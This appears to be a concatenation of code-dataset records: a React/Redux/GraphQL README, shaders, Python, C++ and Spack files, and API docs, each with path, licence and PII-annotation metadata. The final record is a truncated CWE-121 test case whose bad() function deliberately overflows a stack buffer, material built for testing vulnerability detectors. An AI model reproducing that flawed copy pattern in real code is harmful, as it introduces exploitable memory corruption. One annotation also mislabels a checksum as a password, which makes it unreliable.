This is something to look forward to because React’s programming language is integrated with a very huge code base that is seemingly endless and a huge run time complexity that developers just hate.
Once you understand the cons of bidirectional data flow, it would be easier to understand why unidirectional data flow is the best.
In the bidirectional data flow, you have the typical data flow — Model-View-Controller. But when applications became more complex, the Controller begins to feel the burden.
The Controller takes the huge responsibility of maintaining both the application state and the data. Also, the cascading updates makes the app really difficult to understand and debug. In the end, you have an application whose results are totally unpredictable.
With unidirectional data flow, this problem is mitigated, and eventually, predictable application state is achieved. When the data flow is unidirectional, changes in the application view layer will trigger an action in the data layer. These changes will then be reflected in the View. The View does not directly affect application data.
[[more on flux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01-react-ecosystem/Flux-architecture.md)]
## Redux
[Redux](http://redux.js.org/) is one of the popular implementations of facebook's flux architecture discussed above. However there are slight differences in dispatcher and data-flow part.
According to Github, Redux is a predictable state container for JavaScript apps. Many of the concepts are similar to functional programming, and all the data is kept in a single store. .
Irrespective of the application size, Redux is always a single object, quite unlike Flux, which keeps separate stores for different kinds of data. If there are manipulations to be made on the data, it doesn’t affect the state. In this way, the state is immutable.
All updates and manipulation are done on a state tree. But this does not make the application slow as the data can be shared along several versions of the state tree.
The updates on the application state is done through Actions, which are plain objects themselves, but contains a type property depicting the kind of action performed. The data that describes the action will also be included.
The Store’s Dispatcher will dispatch the action and from there, it goes to the Reducer, and then to the current state tree. Here, the actions of the application would be described — the different things the application can do. Just a single reducer would be enough for the state transformation and action.
[[more on redux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01-react-ecosystem/Redux.md)]
## Relay & GraphQL
As discussed above Flux and Redux are data handling patterns to keep our UI in sync. When a user interaction happens, they update the state and trigger rerendering.
But, how do we get the data that a component needs from a server, and then update the server when the user makes changes?
Relay takes care of this problem. It makes it easy to fetch data from the server as part of our data flow. In order to do this, Relay needs to know what data each component needs from the server. This is where GraphQL comes in.
> [Relay](https://facebook.github.io/relay/docs/getting-started.html) is an open source project by Facebook that exposes a framework they have been using internally for years. It is the glue that binds components written in React to data fetched from a GraphQL server.
> [GraphQL](http://graphql.org), a query language that is starting to get more and more attention. Facebook, who internally used GraphQL since 2012 and released a first specification and reference implementation of GraphQL in 2015 announced GraphQL to be [production ready] in September 2016. What followed is a trend of more and more companies starting to use GraphQL, such as [GitHub](https://youtu.be/hT-4pVmkGt0), [Coursera](https://youtu.be/JC-UJwBKc2Y) and [Shopify](https://youtu.be/Wlu_PWCjc6Y).
> One of the main benefits of using GraphQL is how so called queries allow clients to specify their data requirements in a declarative way. Instead of collecting all the data from different endpoints, as is usual with REST, queries allow an exact and fine-grained selection of data fields that are then resolved by the server. This leads to prevention of data over- and underfetching, two common problems of REST.
> Facebook developed graphql to provide a data source that can evolve without breaking existing code and to favor speed on low-powered and low-quality mobile devices. The schema can evolve, but should never break. Products are described in graphs and queries, instead of the REST notion of endpoints.
> A query might be resolved by multiple data sources: REST APIs, database, a flat JSON file. A product might begin by returning data from a simple CSV file, and later be grow to return data from a cluster of databases or remote storage like BigTable.
> GraphQL is simply a clearinghouse for queries. It also comes with a tool called GraphiQL that allows you to view and debug your queries visually. And Facebook has open-sourced a library, called DataLoader, that makes it easy to query multiple backends asynchronously without having to write custom Promise logic that ends up in callback hell.
> Relay acts as a partner to GraphQL and React. A top-level query usually happens on a route — a URL pattern that loads a component when it is matched.
> GraphQL “fragments” are co-located with your React components. A component describes what slices of data it needs on certain types. Relay queries “spread” the fragments of other components. In this particular case, the “slug” is extracted from the URL path and passed to our GraphQL query. The Page component will be populated with a “viewer” prop that contains the data specified.
> As React components become more nested, queries can become increasingly complex. In Relay Classic, all of the query-parsing logic happened at runtime. As of [Relay Modern](https://facebook.github.io/relay/docs/relay-modern.html), queries are now parsed at build time and are static at runtime. This is great for performance.
When we build React components, it’s easy to reuse them across different parts of our site. This is one of the main benefits of React. It’s called composability.If our component needs to use data from the server, though, it gets harder to just drop a component in place. The server needs to know what properties the component needs. In many apps, this will be hard-coded on the server. There will be a URL (called an endpoint) that passes down data for that particular view. The endpoint code will know exactly what properties its view needs.
The problem here is that whenever we add (or remove) properties from the component, we have to change the server code too. This is called coupling; when we change one, we have to change the other, too.
Because we have to manually keep these two in sync, it makes bugs and obsolete code more likely.
* Bugs come from underfetching data. we don’t pull down the properties that we need for a component because you forgot to add them to the server.
* Obsolete code results in overfetching data. For example, let’s say you remove a component from the tree. Do you delete its properties from the server response? How can we be sure another component doesn’t use that endpoint and need those properties? Instead, it’s better to just keep them in the response… but then we have a lot of cruft lying around.
With GraphQL, we don’t hard-code the server with the list of properties that our view needs. Instead, the component provides a list of what it needs to the server.
This list is combined with the lists from other components. The structure of the combined list is a tree, just like the component tree. It gets handed off to the endpoint. There’s only one endpoint and it handles all requests.
The nice thing about this is that it localizes changes. When we need to add or remove a property, we only need to change the component… not the server.
* [complete tutorial on graphql](https://www.howtographql.com/basics/2-core-concepts/)
* [relay-graphql explained in fun cortoon way by Lin, part 1, 2, 3](https://code-cartoons.com/a-cartoon-intro-to-facebook-s-relay-part-1-3ec1a127bca5)
Next steps : [building pokedex](https://github.com/shekhargulati/52-technologies-in-2016/blob/master/43-graphql/README.md)
## React Native
React Native is a framework developed by Facebook. It allows us to create real mobile applications identical to an application built using Swift or Java. The same fundamental UI building blocks used by iOS and Android are used by React Native. These building blocks are just put together using JavaScript and React.
React-Native has been around for about 2 years(initial release in 2015).
Facebook’s React Native user interface (UI) design framework is on the leading edge of this technology. React Native is a partnership between everything you’re used to from React on the web and the benefits of native applications. It provides you the speed, fidelity, and feel of native applications while retaining what you are used to from React on the web, like fast development cycles and declarative self-contained UI components.
**How is React Native different from React?**
React Native is not a different version of React. React Native is a custom renderer for React, just like React DOM on The Web. React Native uses native components instead of web components like React as building blocks. To begin with React Native, you need to know the basic React concepts, like JSX, components, state, and props. If you know React, you still need to learn stuff specific to React Native, like the native components. React Native also gives access to the features these platforms offer, apart from transforming React code to work on iOS and Android.
**How does React Native work?**
If you are familiar with React for the web, you’ll feel right at home with React Native. If you are used to writing apps in Java or Swift, you’ll feel right at home with many of React Native’s components.
React is a JavaScript library for building user interfaces, focusing on the view portion of your application. This means when you write a React Native app, your view code will feature React components, which are small pieces of code describing how a portion of your app should look based on some set of input data.
**Companies which have worked with React Native**
Facebook, GitHub, Airbnb, Box, Google, Microsoft, Pinterest, Pixar Animation Studios, Twitter, Uber, Instagram, LinkedIn, and WhatsApp all use React code. [more](https://facebook.github.io/react-native/showcase.html)
**Benefits**
* Cross-platform Android and iOS have different codebases, so businesses often have to hire engineers to work on both platforms. With React Native you don’t have to build the same application for iOS and Android, separately. React Native helps developers reuse the common logic layer across the web, mobile, and other operating systems.
* Truly native Writing applications for a specific operating system is defined as native app creation. Many software frameworks let you believe in its ability to create good applications for Android and iOS, but most often than not the product ends up somewhere in between, without feeling truly native to either. React Native enables developers to make truly native apps, by embracing native platforms while allowing your app to share the majority of its codebase between platforms, without the increase in budget building two separate apps would entail.
* Readability Even to those unfamiliar with React, it is easily readable. Many frameworks require you to learn an extensive list of concepts which are only useful within the framework. React strives to do the opposite.
* Declarative style In declarative programming, developers tell an application what they are trying to achieve. While with imperative programming, a developer has to specify exactly how to do it. In this style of programming you have less flexibility in how things occur but being able to describe the state reduces the possibility of bugs drastically.
* The component-based structure allows a web-style approach to developmentReact Native’s component-based structure allows developers to build apps with a more agile, web-style approach to development than most hybrid frameworks, and without any web at all.
* Community Backing The majority of your React Native code is JavaScript, so you reap the benefit of all the advancements in the language and its ecosystem. If you know JavaScript, React Native will be easy to pick-up, allowing most front-end web developer to be a mobile developer. All you need to know is JavaScript, platform APIs, some native UI elements, and any other platform-specific design patterns and you’re set.
* Reloading Instead of recompiling, you can reload your app instantly. You’re given two options: Live Reloading will reload the app every time you edit and save one of its files. Hot Reloading only reloads the file you just edited, not the entire file.
* Use native code when you need to It's simple to drop down to native code if you need to optimize a few aspects of your application. It's also easy to build part of your app in React Native, and part of your app using native code directly, its how the Facebook app works.
* No need to overhaul old app All you have to do is add React Native UI components into your existing app’s code, without having to rewrite. Or with a plugin, reuse the Cordova-based code if your current hybrid app was built using Cordova and Ionic. This is a significant advantage for businesses looking to expand an existing app without having to overhaul it.
* Efficiency Native app development usually means inefficiency, slower time to deployment, and less developer productivity. React Native is all about bringing high speed, responsiveness, and agility of web app development along with effectual processing and best user experience to the hybrid space, to provide your users with a native app experience.
React native isn’t just an introduction to native applications for web developers. It is a powerful tool, but not ideal for every solution. Remember, complex apps require more native solutions which in turn need more native developers. Else, it could slow down the development process. However, React Native is the best approach for applications with less complex UI. You will get a well performant, truly native app with fewer resources spent.
[Source: [react-native](https://www.cognitiveclouds.com/insights/all-you-need-to-know-about-react-native/)]
## Next steps:
* I will keep this article updated with my new findings.
* I have experimented some of the basic react-redux apps while going through tutorials in [Codepen](https://codepen.io/kr_gopala/)
* to develop a complete full stack web application using react+ redux + graphql and deploy it on heroku.
* to build a native hacker news app similar to [hackernews-react-graphql](https://github.com/gopala-kr/hackernews-react-graphql) and deploy it on app store and google play store.
(this will be an another post)
|
Markdown
|
MIT
|
gopala-kr/10-weeks/Projects-Blogs/01-react-ecosystem/README.md
|
d5d0b9a9-2191-4109-a3fc-fe24a705e256
|
[{"tag": "USERNAME", "value": "@gethylgeorge", "start": 10583, "end": 10596, "context": "OM and diffing works in React](https://medium.com/@gethylgeorge/how-virtual-dom-and-diffing-works-in-react-6fc805"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 16816, "end": 16825, "context": " and action.\n\n[[more on redux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 29307, "end": 29316, "context": " to [hackernews-react-graphql](https://github.com/gopala-kr/hackernews-react-graphql) and deploy it on app st"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 15327, "end": 15336, "context": "ication data.\n\n[[more on flux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "kr_gopala", "start": 29097, "end": 29106, "context": "through tutorials in [Codepen](https://codepen.io/kr_gopala/)\n* to develop a complete full stack web applicat"}, {"tag": "NAME", "value": "Jordan Walke", "start": 4343, "end": 4355, "context": "larJS. [Source : wikipedia]\n\nReact was created by Jordan Walke, a software engineer at Facebook. He was influenc"}]
|
[{"tag": "USERNAME", "value": "@gethylgeorge", "start": 10583, "end": 10596, "context": "OM and diffing works in React](https://medium.com/@gethylgeorge/how-virtual-dom-and-diffing-works-in-react-6fc805"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 16816, "end": 16825, "context": " and action.\n\n[[more on redux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 29307, "end": 29316, "context": " to [hackernews-react-graphql](https://github.com/gopala-kr/hackernews-react-graphql) and deploy it on app st"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 15327, "end": 15336, "context": "ication data.\n\n[[more on flux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "kr_gopala", "start": 29097, "end": 29106, "context": "through tutorials in [Codepen](https://codepen.io/kr_gopala/)\n* to develop a complete full stack web applicat"}, {"tag": "NAME", "value": "Jordan Walke", "start": 4343, "end": 4355, "context": "larJS. [Source : wikipedia]\n\nReact was created by Jordan Walke, a software engineer at Facebook. He was influenc"}]
|
//---------------------------------------------------------------------------
#include <opengl/vertex_layout.h>
//---------------------------------------------------------------------------
static const char * const shader_code_2d_wired_rect_vs = R"SHADER(
/**
* !vertex: p2 t
*/
#version 330 core
layout(std140) uniform Area
{
vec2 pos;
vec2 size;
float depth;
};
layout(std140) uniform Viewport
{
vec2 viewport;
};
in vec2 position;
in vec2 texcoord;
out Vertex
{
vec2 texcoord;
vec2 ratio;
} output;
void main(void)
{
output.ratio = size * viewport;
output.texcoord = texcoord;
gl_Position = vec4(position * size + pos, depth, 1.0);
}
)SHADER";
//---------------------------------------------------------------------------
static const ::asd::opengl::vertex_layout & shader_code_2d_wired_rect_layout = ::asd::opengl::vertex_layouts::p2t::get();
//---------------------------------------------------------------------------
|
C
|
MIT
|
BrightComposite/RSToolkit/code/modules/opengl/resources/opengl/shaders/2d/wired/rect/vs.shader.h
|
5982783c-046c-412f-b97d-05b6c1369a44
|
[]
|
[]
|
# from https://stackoverflow.com/questions/8032642/how-to-obtain-image-size-using-standard-python-class-without-using-external-lib
import struct
import imghdr
def get_image_size(fname):
"""Determine the image type of fhandle and return its size.
from draco"""
with open(fname, "rb") as fhandle:
head = fhandle.read(24)
if len(head) != 24:
return
if imghdr.what(fname) == "png":
check = struct.unpack(">i", head[4:8])[0]
if check != 0x0D0A1A0A:
return
width, height = struct.unpack(">ii", head[16:24])
elif imghdr.what(fname) == "gif":
width, height = struct.unpack("<HH", head[6:10])
elif imghdr.what(fname) == "jpeg":
try:
fhandle.seek(0) # Read 0xff next
size = 2
ftype = 0
while not 0xC0 <= ftype <= 0xCF:
fhandle.seek(size, 1)
byte = fhandle.read(1)
while ord(byte) == 0xFF:
byte = fhandle.read(1)
ftype = ord(byte)
size = struct.unpack(">H", fhandle.read(2))[0] - 2
# We are at a SOFn block
fhandle.seek(1, 1) # Skip `precision' byte.
height, width = struct.unpack(">HH", fhandle.read(4))
except Exception: # IGNORE:W0703
return
else:
return
return width, height
|
Python
|
MIT
|
geraked/mdpdfbook/mdpdfbook/mdpdf/image.py
|
73d2e5ff-912a-4884-bc7c-db3356796c58
|
[]
|
[]
|
/*=============================================================================
Copyright (c) 2003 Jonathan de Halleux (dehalleux@pelikhan.com)
http://spirit.sourceforge.net/
Use, modification and distribution is subject to the Boost Software
License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#include "action_tests.hpp"
int
main()
{
assign_action_test();
assign_key_action_test();
clear_action_test();
decrement_action_test();
erase_action_test();
increment_action_test();
insert_key_action_test();
push_front_action_test();
push_back_action_test();
swap_action_test();
return boost::report_errors();
}
|
C++
|
BSD-3-Clause
|
0xDEC0DE8/mcsema/boost/libs/spirit/classic/test/actor/action_tests.cpp
|
5d4a8931-8485-4922-8cc8-d3ba2700ff1d
|
[{"tag": "NAME", "value": "Jonathan de Halleux", "start": 103, "end": 122, "context": "==========================\n Copyright (c) 2003 Jonathan de Halleux (dehalleux@pelikhan.com)\n http://spirit.source"}]
|
[{"tag": "NAME", "value": "Jonathan de Halleux", "start": 103, "end": 122, "context": "==========================\n Copyright (c) 2003 Jonathan de Halleux (dehalleux@pelikhan.com)\n http://spirit.source"}]
|
import React from "react"
import landingStyles from "../styles/landing.module.css"
import HeroHeader from "./heroHeader"
import PortfolioProjects from "./portfolioProjects"
const Landing = () => {
return (
<div className={landingStyles.landingContainer}>
<link
rel="stylesheet"
href="https://cdn.jsdelivr.net/gh/konpa/devicon@master/devicon.min.css"
></link>
<HeroHeader />
<PortfolioProjects />
</div>
)
}
export default Landing
|
JavaScript
|
MIT
|
alekspopovic/Gatsby-website-and-blog/src/components/landing.js
|
d39b4db0-0b5c-45fc-a897-6ebee1ee50cf
|
[]
|
[]
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Parsplice(CMakePackage):
"""ParSplice code implements the Parallel Trajectory Splicing algorithm"""
homepage = "https://gitlab.com/exaalt/parsplice"
url = "https://gitlab.com/api/v4/projects/exaalt%2Fparsplice/repository/archive.tar.gz?sha=v1.1"
git = "https://gitlab.com/exaalt/parsplice.git"
tags = ['ecp', 'ecp-apps']
version('develop', branch='master')
version('1.1', '3a72340d49d731a076e8942f2ae2f4e9')
depends_on("cmake@3.1:", type='build')
depends_on("berkeley-db")
depends_on("nauty")
depends_on("boost")
depends_on("mpi")
depends_on("eigen@3:")
depends_on("lammps+lib@20170901:")
def cmake_args(self):
options = ['-DBUILD_SHARED_LIBS=ON']
return options
|
Python
|
ECL-2.0
|
1nf1n1t3l00p/spack/var/spack/repos/builtin/packages/parsplice/package.py
|
be4a23ec-9ba1-4aaa-8862-804792b2b376
|
[{"tag": "PASSWORD", "value": "3a72340d49d731a076e8942f2ae2f4e9", "start": 641, "end": 673, "context": "n('develop', branch='master')\n version('1.1', '3a72340d49d731a076e8942f2ae2f4e9')\n\n depends_on(\"cmake@3.1:\", type='build')\n "}]
|
[{"tag": "PASSWORD", "value": "3a72340d49d731a076e8942f2ae2f4e9", "start": 641, "end": 673, "context": "n('develop', branch='master')\n version('1.1', '3a72340d49d731a076e8942f2ae2f4e9')\n\n depends_on(\"cmake@3.1:\", type='build')\n "}]
|
/**
\file mwld_simulator.cpp
\author Babarczi Peter
\author babarczi@tmit.bme.hu
\date 2015 november
*/
#include "mwld_simulator.h"
#include <sstream>
void MWLDSimulator::reset()
{
threenines = 0;
fournines = 0;
sum_availability = 0;
min_availability = 1.0;
avail_blocked = 0;
wp_blocked = 0;
pp_blocked = 0;
used_edge_number = 0;
used_capacity = 0;
blocked_connections = 0;
ss_blocked_connections = 0;
counter = 0;
smart_smpair = false;
nullcap = 0;
halfcap = 0;
seedd = 1;
}
MWLDSimulator::MWLDSimulator(Digraph &_g) :
g(_g), cap(g),reduced_cap(g),rfd_cap(g), id(g),
cost(g), delaymin(g), delaymax(g), minusdelaymax(g), free_cap(g), coords(g), srg_set(g), state_prob(srg_set), srg_id(srg_set), link_unav(g), node_unav(g),
avail_blocked(0), wp_blocked(0), pp_blocked(0), threenines(0), fournines(0) // deficit_proc(0), extra_proc(0), deficit_num(0), extra_num(0), deficit_p(false), extra_p(false)
{
edge_number = 0;
node_number = 0;
srg_number = 0;
demand_number = 0;
bottlenecks = 0;
sum_availability = 0.0;
min_availability = 1.0;
used_edge_number = 0;
used_capacity = 0;
blocked_connections = 0;
ss_blocked_connections = 0;
counter = 0;
smart_smpair = false;
nullcap = 0;
halfcap = 0;
seedd = 1;
}
Digraph& MWLDSimulator::getG()
{
return g;
}
DNode MWLDSimulator::getNode(int nodeId)
{
for (DNodeIt nit(g); nit != INVALID; ++nit)
if (g.id(nit) == nodeId)
{
return nit;
}
}
void MWLDSimulator::setEdgesWithEnoughCapacity(DBoolMap& can_be_work_edge, double mincapacity) const
{
for (ArcIt eit(g); eit != INVALID; ++eit)
{
if (mincapacity > free_cap[eit])
can_be_work_edge[eit] = false;
}
}
void MWLDSimulator::chooseSRLGList(DNode source, DNode target, BoolSRLGMap & havetoprotect)
{
int num = 0;
for(SRLGIt srg_it(srg_set);srg_it != INVALID;++srg_it){
havetoprotect[srg_it] = false;
}
for(SRLGIt srg(srg_set);srg != INVALID;++srg){
DBoolMap should_be_use(g);
for(ArcIt it(g);it != INVALID;++it)
should_be_use[it] = true;
for(SRLGArcIt srg_edge_it(srg_set, srg);srg_edge_it != INVALID;++srg_edge_it)
should_be_use[srg_edge_it] = false;
DFilteredGraph allowed_subgraph(g, should_be_use);
DFDijkstra prot_dijkstra(allowed_subgraph, cost);
if(prot_dijkstra.run(source, target)){
havetoprotect[srg] = true;
num++;
}
}
//cout << "SRLGs need protection: " << num << endl;
}
void MWLDSimulator::addToBuiltConnections(TrafficDemand<Digraph>& next_demand, list<TrafficDemand<Digraph> > & built_connections)
{
for(ArcIt eit(g);eit != INVALID;++eit){
for(map<string,double>::iterator str_it = next_demand.used_edges.begin();str_it != next_demand.used_edges.end();++str_it){
string compare = str_it->first;
double percentage = str_it->second;
if(make_name("-", eit, g) == compare){
free_cap[eit] = free_cap[eit] - next_demand.capacity * percentage;
free_cap[oppositeArc(eit)] = free_cap[oppositeArc(eit)] - next_demand.capacity * percentage;
used_edge_number = used_edge_number + percentage;
used_capacity = used_capacity + next_demand.capacity * percentage;
}
}
}
built_connections.push_back(next_demand);
}
//! Read input graph
void MWLDSimulator::readGraph(ifstream &srg_file, int capacity)
{
//cout << "Reading the graph from input file..." <<endl;
DigraphReader<Digraph> unavreader(g, srg_file);
unavreader.nodeMap("coords", coords) .nodeMap("unav", node_unav) .arcMap("unav", link_unav).run();
for (ArcIt eit(g); eit != INVALID; ++eit)
edge_number++;
edge_number /= 2; // As the graph is directed
for (DNodeIt nit(g); nit != INVALID; ++nit)
node_number++;
for (ArcIt eit(g); eit != INVALID; ++eit){
cap[eit] = capacity;
free_cap[eit] = cap[eit];
cost[eit] = 1;
rnd = random();
int delayconst = 5;
DNode n1 = g.source(eit);
DNode n2 = g.target(eit);
lemon::dim2::Point<float> tempinput = coords[n2] - coords[n1];
delaymin[eit] = sqrt(tempinput.normSquare())*delayconst;
delaymax[eit] = sqrt(tempinput.normSquare())*delayconst;
minusdelaymax[eit] = -1*delaymax[eit];
}
}
//! Read connection requests.
void MWLDSimulator::readTraffic(ifstream &trf_file)
{
//cout << endl << "Reading the traffic file..." <<endl;
while (!trf_file.eof())
{
string mode;
int id;
trf_file >> mode;
if (mode == "c")
{ // create connection
demand_number++;
int connId;
int sourceNodeId;
int targetNodeId;
DCapValue capacity;
trf_file >> connId;
trf_file >> sourceNodeId;
trf_file >> targetNodeId;
trf_file >> capacity;
traffic_queue.push(TrafficDemand<Digraph>(&g, &srg_set, BUILD, connId, getNode(sourceNodeId),
getNode(targetNodeId), capacity));
}
else if (mode == "r")
{
int connId;
trf_file >> connId;
traffic_queue.push(TrafficDemand<Digraph>(&g, &srg_set, RELEASE, connId, DNode(), DNode(), 0));
}
trf_file.ignore(256, '\n');
}
cout << "trfqueue size: " << traffic_queue.size() << endl;
}
//! Read failure list, contains single link failures by default.
void MWLDSimulator::readSRLGSet(ifstream &srg_file)
{
log_msg(2) << "Reading the SRLGSet from input file..." <<endl;
queue<int> id_q;
queue<vector<string> > edges_q;
queue<long double> state_prob_q;
SRLGReader srg_reader;
srg_reader.readSRGSet(srg_file, id_q, edges_q, state_prob_q);
for(int i = id_q.size(); i > 0; i--){
SRLG srg = srg_set.addSRG();
log_msg(2) << "\nSRLG "<<make_name(srg,srg_set)<<" ";
srg_id[srg] = id_q.front();
state_prob[srg] = state_prob_q.front();
for(vector<string>::iterator string_it = edges_q.front().begin(); string_it != edges_q.front().end(); string_it++){
for(ArcIt eit(g); eit != INVALID; ++eit){
if( make_name("-", eit, g) == *string_it ){
srg_set.addArcToSRG(srg,eit);
log_msg(2) << " " << make_name("-", eit, g);
break;
}
}
}
id_q.pop();
edges_q.pop();
state_prob_q.pop();
}
for(SRLGIt srg_it(srg_set);srg_it != INVALID;++srg_it) srg_number++;
}
void MWLDSimulator::viewSRLGSet(SRLGSet& _srg_set) const
{
//cout<<endl<<"Now we walk throught the SRLG-s and the arcs in them."<<endl;
for (SRLGIt srg_it(_srg_set); srg_it != INVALID; ++srg_it)
{
cout << "SRLG: " << make_name(srg_it, _srg_set) << endl;
cout << " and the arcs in it:" << endl;
for (SRLGArcIt srg_edge_it(_srg_set, srg_it); srg_edge_it != INVALID; ++srg_edge_it)
{
cout << " arc: " << make_name("->", srg_edge_it, g) << endl;
}
}
}
MWLDSimulator::~MWLDSimulator()
{
}
|
C++
|
MIT
|
peterbabarczi/mwldsim/mwld_simulator.cpp
|
cc3c669c-adc9-4f5c-ab7c-a206c5423b63
|
[{"tag": "EMAIL", "value": "babarczi@tmit.bme.hu", "start": 90, "end": 110, "context": " Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date 2015 november\n*/\n\n#include "}, {"tag": "NAME", "value": "Babarczi Peter", "start": 53, "end": 67, "context": "\n \\file mwld_simulator.cpp\n\n \\author Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date"}]
|
[{"tag": "EMAIL", "value": "babarczi@tmit.bme.hu", "start": 90, "end": 110, "context": " Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date 2015 november\n*/\n\n#include "}, {"tag": "NAME", "value": "Babarczi Peter", "start": 53, "end": 67, "context": "\n \\file mwld_simulator.cpp\n\n \\author Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date"}]
|
[stime](../README.md) › [Globals](../globals.md) › ["Format/Minute"](../modules/_format_minute_.md) › [Minute](_format_minute_.minute.md)
# Class: Minute
Minute format
## Hierarchy
* [Format](_format_.format.md)
↳ **Minute**
## Index
### Methods
* [format](_format_minute_.minute.md#format)
* [formatNumber](_format_minute_.minute.md#protected-formatnumber)
* [parse](_format_minute_.minute.md#parse)
* [parsePaddedAndUnpaddedUnits](_format_minute_.minute.md#protected-parsepaddedandunpaddedunits)
## Methods
### format
▸ **format**(`time`: [Formattable](_formattable_.formattable.md), `format`: string): *string*
*Overrides [Format](_format_.format.md).[format](_format_.format.md#abstract-format)*
*Defined in [Format/Minute.ts:11](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L11)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`time` | [Formattable](_formattable_.formattable.md) |
`format` | string |
**Returns:** *string*
___
### `Protected` formatNumber
▸ **formatNumber**(`number`: number, `leadingZero`: boolean): *string*
*Inherited from [Year](_format_year_.year.md).[formatNumber](_format_year_.year.md#protected-formatnumber)*
*Defined in [Format.ts:27](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L27)*
Format a number to a string and have it include or exclude
leading zeros
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`number` | number | Number to format |
`leadingZero` | boolean | True if leading zeros should be included false otherwise |
**Returns:** *string*
Formatted number
___
### parse
▸ **parse**(`parsable`: string, `format`: string): *number*
*Defined in [Format/Minute.ts:26](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L26)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`parsable` | string |
`format` | string |
**Returns:** *number*
___
### `Protected` parsePaddedAndUnpaddedUnits
▸ **parsePaddedAndUnpaddedUnits**(`parsable`: string, `format`: string, `token`: string): *number*
*Inherited from [Year](_format_year_.year.md).[parsePaddedAndUnpaddedUnits](_format_year_.year.md#protected-parsepaddedandunpaddedunits)*
*Defined in [Format.ts:43](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L43)*
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`parsable` | string | - |
`format` | string | - |
`token` | string | |
**Returns:** *number*
|
Markdown
|
MIT
|
LiamCottrell/STime/docs/classes/_format_minute_.minute.md
|
21837c34-1a60-4104-a8e5-6af1dd72eb2c
|
[]
|
[]
|
/**
* OEML - REST API
* This section will provide necessary information about the `CoinAPI OEML REST API` protocol. This API is also available in the Postman application: <a href=\"https://postman.coinapi.io/\" target=\"_blank\">https://postman.coinapi.io/</a>
*
* The version of the OpenAPI document: v1
* Contact: support@coinapi.io
*
* NOTE: This class is auto generated by OpenAPI-Generator 5.1.1.
* https://openapi-generator.tech
* Do not edit the class manually.
*/
#include "ApiConfiguration.h"
namespace org {
namespace openapitools {
namespace client {
namespace api {
ApiConfiguration::ApiConfiguration()
{
}
ApiConfiguration::~ApiConfiguration()
{
}
const web::http::client::http_client_config& ApiConfiguration::getHttpConfig() const
{
return m_HttpConfig;
}
void ApiConfiguration::setHttpConfig( web::http::client::http_client_config& value )
{
m_HttpConfig = value;
}
utility::string_t ApiConfiguration::getBaseUrl() const
{
return m_BaseUrl;
}
void ApiConfiguration::setBaseUrl( const utility::string_t value )
{
m_BaseUrl = value;
}
utility::string_t ApiConfiguration::getUserAgent() const
{
return m_UserAgent;
}
void ApiConfiguration::setUserAgent( const utility::string_t value )
{
m_UserAgent = value;
}
std::map<utility::string_t, utility::string_t>& ApiConfiguration::getDefaultHeaders()
{
return m_DefaultHeaders;
}
const std::map<utility::string_t, utility::string_t>& ApiConfiguration::getDefaultHeaders() const
{
return m_DefaultHeaders;
}
utility::string_t ApiConfiguration::getApiKey( const utility::string_t& prefix) const
{
auto result = m_ApiKeys.find(prefix);
if( result != m_ApiKeys.end() )
{
return result->second;
}
return utility::conversions::to_string_t("");
}
void ApiConfiguration::setApiKey( const utility::string_t& prefix, const utility::string_t& apiKey )
{
m_ApiKeys[prefix] = apiKey;
}
}
}
}
}
|
C++
|
MIT
|
Martin-Molinero/coinapi-sdk/oeml-sdk/cpp-restsdk/ApiConfiguration.cpp
|
496b3dfa-12e5-4750-8919-dcdfe9e2d57c
|
[]
|
[]
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33.cpp
Label Definition File: CWE121_Stack_Based_Buffer_Overflow__CWE805.string.label.xml
Template File: sources-sink-33.tmpl.cpp
*/
/*
* @description
* CWE: 121 Stack Based Buffer Overflow
* BadSource: Set data pointer to the bad buffer
* GoodSource: Set data pointer to the good buffer
* Sinks: loop
* BadSink : Copy string to data using a loop
* Flow Variant: 33 Data flow: use of a C++ reference to data within the same function
*
* */
#include "std_testcase.h"
#include <wchar.h>
namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33
{
#ifndef OMITBAD
void bad()
{
wchar_t * data;
wchar_t * &dataRef = data;
wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
/* FLAW: Set a pointer to a "small" buffer. This buffer will be used in the sinks as a destination
* buffer in various memory copying functions using a "large" source buffer. */
data = dataBadBuffer;
data[0] = L'\0'; /* null terminate */
{
wchar_t * data = dataRef;
{
size_t i;
wchar_t source[100];
wmemset(source, L'C', 100-1); /* fill with L'C's */
source[100-1] = L'\0'; /* null terminate */
/* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
